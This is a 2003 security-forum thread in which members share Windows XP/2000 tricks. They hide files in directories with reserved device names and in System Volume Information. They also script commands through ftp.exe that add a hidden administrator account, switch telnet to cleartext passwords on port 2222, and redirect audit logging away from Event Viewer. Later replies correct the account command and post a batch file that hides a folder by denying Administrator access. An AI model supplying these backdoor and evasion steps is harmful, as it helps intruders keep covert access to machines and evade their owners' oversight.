Government Security
Network Security Resources

Jump to content

Photo

Windows Xp/2k Information

- - - - - windows audit
  • Please log in to reply
13 replies to this topic

#1 Fuas

Fuas

    Private First Class

  • Members
  • 25 posts

Posted 26 December 2003 - 07:56 AM

Been reading this board and must say its execlent. so thought I would share some of my knowledge.

Illegal Dirs.

use md \\.\(drive):\(path)
ie md \\.\c:\recycler\com1\aux\lpt1\lpt2\nul\end

note: you must include a valid dir at the last entry to be able to enter it.

to enter the dir simply use cd c:\recycler\com1\aux\lpt1\lpt2\nul\end
and it will change. you can then store whatever into here :)

another nice hideing place is c:\system volume information. this is usually unaccessible by local users. so nice to hide files :)


dissable NTLM and enable clear text password in windows XP for telnet.

tlntadmn config sec=-ntlm+passwd

then then use

tlntadmn config auditlocation=file
to stop logging to eventviewer


scripting telnet using ftp.exe.

first make a txt file with the commands you need. ie

file.txt contains
net user testing test123 /add
net localgroup administrators test123 /add
tlntadmin config sec=-ntlm+passwd
tlntadmn config auditlocation=file
tlntadmn config port=2222
net start telnet
quit

(so adds a username to the system. then enables clear text, change telnet port to 2222 and then starts the telnet service)

to run use ftp.exe -s:file.txt -n (ip) (port)

it will then connect to the (ip) using (port) and run the commands in the file :)

____

hope this info is usefull to somebody out there :) njoy and b safe.

Note: Updated the telnet bits. shoud work correct now sorry.

#2 GhostCow

GhostCow

    Staff Sergeant

  • Members
  • 345 posts

Posted 26 December 2003 - 04:03 PM

thanks great info!!
does the illegal dir stay hidden after you put files in it too?

#3 daTh0r

daTh0r

    Private First Class

  • Members
  • 43 posts

Posted 26 December 2003 - 04:08 PM

thx :lol:

i'll try it immediatly :lol:

#4 jimmy

jimmy

    Specialist

  • Members
  • 135 posts

Posted 26 December 2003 - 04:49 PM

hmmz
there are several commands to display everything in those locked dirs
the most easy one is

dir *.* /s

when you start in that dir of course

example

D:\test\temp>dir *.* /s
 De volumenaam van station D is HARDDISK
 Het volumenummer is 80DA-684B

 Map van D:\test\temp

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
27/12/2003  01:49    <DIR>          lala
27/12/2003  01:49    <DIR>          tata
               0 bestand(en)                0 bytes

 Map van D:\test\temp\lala

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
               0 bestand(en)                0 bytes

 Map van D:\test\temp\tata

27/12/2003  01:49    <DIR>          .
27/12/2003  01:49    <DIR>          ..
               0 bestand(en)                0 bytes

     Totaal aantal weergegeven bestanden:
               0 bestand(en)                0 bytes
               8 map(pen)  58.934.087.680 bytes beschikbaar

this will also show the locked paths/Illegal Dirs.

#5 Fuas

Fuas

    Private First Class

  • Members
  • 25 posts

Posted 27 December 2003 - 12:55 AM

Jimmy, you are correct, But if you use c:\system volume information\com1\aux\hidden then you carnt dir /s because you cannot enter system volume information locally. and if try remotly cannot enter the com1 dir to find the rest of the path.

Ghostcow: yes the dir stays hidden. even after files added.

you can also dir \\.\dirs to find path too. but passed the info as it may hide stuff better then some ppl are doing atm (like useing c:\stro to store stuff ;) )

#6 zero-maitimax

zero-maitimax

    Staff Sergeant

  • Members
  • 309 posts

Posted 27 December 2003 - 11:05 AM

and now the bigquestion... can you put a active exe file in it.. and it still can run it...

#7 skorpio

skorpio

    Private First Class

  • Members
  • 47 posts

Posted 27 December 2003 - 03:08 PM

Fluas thx for the sharing, but there is a error :P

when u create a user :

net user testing test123 /add
net localgroup administrators test123 /add


u give the attributes at user "test123" and u have create the user testing :D

therefore the exact writing is:


net user testing test123 /add
net localgroup Administrators testing /add


Thx another for the sharing, bye :D
sorry for my english :-\

#8 Jackson

Jackson

    Private First Class

  • Members
  • 22 posts

Posted 28 December 2003 - 05:02 AM

@echo off
md e:\System Volume Information\dir\
md e:\System Volume Information\dir\aux\ \
md e:\System Volume Information\dir\aux\.tmp\
md e:\System Volume Information\dir\aux\.tmp\result
cacls e:\System Volume Information\dir\\* /T /E /P Administrator:N
echo Hidden Directory is created
@echo on

when u have make ur hidden dir then u can put all files in this dir and can exec files
sry fo my english

#9 Guest_LittleHacker_*

Guest_LittleHacker_*
  • Guests

Posted 28 December 2003 - 05:43 AM

www.Free-Host.com is Hacked!

< I cant add a New Topic ! >

#10 skorpio

skorpio

    Private First Class

  • Members
  • 47 posts

Posted 28 December 2003 - 07:46 AM

LittleHacker which it is the sense of yours post ????


you are a spammer!! -.-

#11 Guest_LittleHacker_*

Guest_LittleHacker_*
  • Guests

Posted 16 January 2004 - 02:58 PM

LittleHacker which it is the sense of yours post ????


you are a spammer!! -.-

No But I'm not able to make a new topic and I'd told this

< I cant add a New Topic ! >


Why?
I think I'd not enough posts! :(

#12 Guest_saendler_*

Guest_saendler_*
  • Guests

Posted 17 January 2004 - 05:56 AM

@echo off
md e:\System Volume Information\dir\
md e:\System Volume Information\dir\aux\ \
md e:\System Volume Information\dir\aux\.tmp\
md e:\System Volume Information\dir\aux\.tmp\result
cacls e:\System Volume Information\dir\\* /T /E /P Administrator:N
echo Hidden Directory is created
@echo on

when u have make ur hidden dir then u can put all files in this dir and can exec files
sry fo my english

very nice way to hide folder and how to delete such?

thx

#13 Guest_^GuZeD^_*

Guest_^GuZeD^_*
  • Guests

Posted 17 January 2004 - 08:29 AM

thanx for the folder hiding tip, was always doing it on a other way but this one looks better, will try it when i have to fix a new box.

#14 Guest_saendler_*

Guest_saendler_*
  • Guests

Posted 17 January 2004 - 08:41 AM

how to delete
----------------
look into hidden folder e.g. dir \\.\C:\SystemVolumeInformation\dir\aux\.tmp

to delete e.g. rd \\.\C:\SystemVolumeInformation\dir\aux\.tmp\result





Also tagged with one or more of these keywords: windows, audit